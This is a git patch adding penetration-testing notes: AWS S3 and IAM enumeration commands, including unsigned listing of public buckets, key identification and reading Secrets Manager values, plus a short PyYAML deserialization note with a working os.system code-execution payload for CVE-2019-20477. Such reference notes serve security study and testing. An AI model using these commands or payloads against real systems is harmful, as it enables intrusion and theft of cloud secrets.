From 615effb8a0d089f5ae44efe07a6acbadce063060 Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Sat, 18 Dec 2021 01:55:17 +0100
Subject: [PATCH] yaml deserialization, s3 buckets enum

---
 enumeration/docs/aws.md         | 84 +++++++++++++++++++++++++++++++++
 exploit/yaml/deserialization.md | 13 +++++
 2 files changed, 97 insertions(+)
 create mode 100644 enumeration/docs/aws.md
 create mode 100644 exploit/yaml/deserialization.md

diff --git a/enumeration/docs/aws.md b/enumeration/docs/aws.md
new file mode 100644
index 0000000..7f93f56
--- /dev/null
+++ b/enumeration/docs/aws.md
@@ -0,0 +1,84 @@
+# AWS S3 Enumeration
+
+## Usage
+
+* [Regions](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html#concepts-available-segions)
+    * `--region`
+### Simple Storage Service (S3)
+* [S3](https://aws.amazon.com/s3/)
+* Methods of access control are as follows
+    * [Bucket policies](https://docs.aws.amazon.com/AmazonS3/latest/userguide/bucket-policies.html)
+    * [S3 ACL](https://docs.aws.amazon.com/AmazonS3/latest/userguide/managing-acls.html)
+
+* Scheme is
+```sh
+http://<bucketname>.s3.amazonaws.com/file.name
+```
+or
+```sh
+http://s3.amazonaws.com/BUCKETNAME/FILENAME.ext
+```
+
+* __List content of public bucket via__
+```sh
+aws s3 ls s3://<bucketname>/ --no-sign-request
+```
+* Download via `curl`, `wget` or `s3` cli via
+```sh
+aws s3 cp s3://<bucketname>/foo_public.xml . --no-sign-request
+```
+
+#### ACL
+* `Anyone`, just `curl`
+* `AuthenticatedUsers`, `s3` cli with aws key
+
+## IAM
+* Not necessarily used by s3
+* Access key ID, starts with `AKIA` + 20 chars
+* Secret access key
+* Session token, `ASIA` + sessionToken
+
+* Add credentials to profile via
+```sh
+aws configure --profile PROFILENAME
+```
+* Config and credentials is stored at `~/.aws`
+* Sanity test profile via
+```sh
+aws s3 ls --profile PROFILENAME
+```
+* Find account ID to an access key
+```sh
+aws sts get-access-key-info --access-key-id AKIAEXAMPLE
+```
+* Find username to an access key
+```sh
+aws sts get-caller-identity --profile PROFILENAME
+```
+* Listing EC2 instances of an account
+```sh
+aws ec2 describe-instances --output text --profile PROFILENAME
+```
+* aws ec2 describe-instances --output text --profile PROFILENAME
+```sh
+aws ec2 describe-instances --output text --profile PROFILENAME
+```
+    * In another region
+```sh
+aws ec2 describe-instances --output text --region us-east-1 --profile PROFILENAME
+```
+
+### AWS ARN
+* Unique ID is create via the following scheme
+```sh
+arn:aws:<service>:<region>:<account_id>:<resource_type>/<resource_name>
+```
+
+### Secrets
+
+```sh
+aws secretsmanager help
+aws secretsmanager list-secrets
+ws secretsmanager get-secret-value --secret-id <Name> --region <region>
+```
+
diff --git a/exploit/yaml/deserialization.md b/exploit/yaml/deserialization.md
new file mode 100644
index 0000000..4a3b281
--- /dev/null
+++ b/exploit/yaml/deserialization.md
@@ -0,0 +1,13 @@
+# YAML Deserialization
+
+* [CVE-2019-20477](https://packetstormsecurity.com/files/cve/CVE-2019-20477)
+* RCE via Yaml execution by Python
+
+* [jolt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)
+
+## Usage
+
+* Example Payload insid foo.yaml gets executed via Python
+```sh
+!!python/object/apply:os.system ["id"]
+```